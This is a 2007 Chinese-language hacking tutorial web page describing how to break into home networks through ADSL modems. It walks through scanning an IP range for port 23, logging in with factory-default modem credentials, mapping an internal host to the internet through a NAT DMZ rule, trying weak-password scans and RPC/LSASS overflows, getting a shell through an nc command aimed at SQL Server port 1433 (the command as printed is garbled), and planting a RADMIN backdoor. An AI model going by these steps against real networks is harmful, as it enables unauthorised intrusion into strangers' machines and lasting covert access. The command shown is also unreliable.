黑客经验之如何穿透ADSL路由入侵内网?

[ 来源:http://www.91now.com/down/ | 作者: | 时间:2007-9-19 21:10:34 | 浏览: 人次 ]

  也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。

  一、扫描

  现在很多ADSL MODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了。开23的主机还真不少,我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234),好了,一矢中的,现在我就是上帝。

  二、映射

  入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192.168.1.2到底开放了什么端口,我们根本就不知道啊。呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上,我们访问ADSL MODEM就等于访问主机192.168.1.2了。

  三、检测漏洞

  现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139、1433等,刚才只是开放了80、23、21而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低啊。

  四、溢出

  既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80、21也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行

  五、募然回首,那人却在,灯火阑珊处

  看来这个管理员还是比较负责的,该打的补丁都打上了。这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是:

  nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

  这样就成功得到一个shell了。

  六、设置后门

  到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。

分类导航
本类阅读排行本类推荐排行
  1. 用SockOnline软件轻松突破端口限制
  2. 经典总结:各个网络端口的入侵方法
  3. 教你防御网络游戏外挂暗藏木马全攻...
  4. 防止全局钩子的入侵
  5. 关于密码知识的介绍
  6. 注册表修复不成功深度解析
  7. 黑客能操控美国电网 让美国全国断...
  8. 完整的XSS wrom网站入侵实例示范
  9. 实用Linux用户账户清洁和安全方法
  10. FVR420v 构建稳定网吧的三点...
  11. 黑客实战 系统泄露密码入侵攻击分...
  12. 密码心理学 看黑客是如何来破解密...
  13. 网页“黑手”如何攻击你的Windows...
  14. 黒客有什么可怕 设个陷阱来逮住他
  15. 绕过主动防御 木马病毒刺穿卡巴斯...
  16. 2007年实现网络安全要注意的七项举...
  17. 提高警惕:更多恶意软件攻击Mac计...
  18. 简单修改木马壳头让卡巴斯基哑口无...
  19. 浅谈高手是如何针对DDos部署防御措...
  20. 小心被深山红叶破解Windows管理员...
随机推荐文章

广告位

最近更新  |  关于我们  |  广告联系  |  版权声明  |  帮助中心  |  交流论坛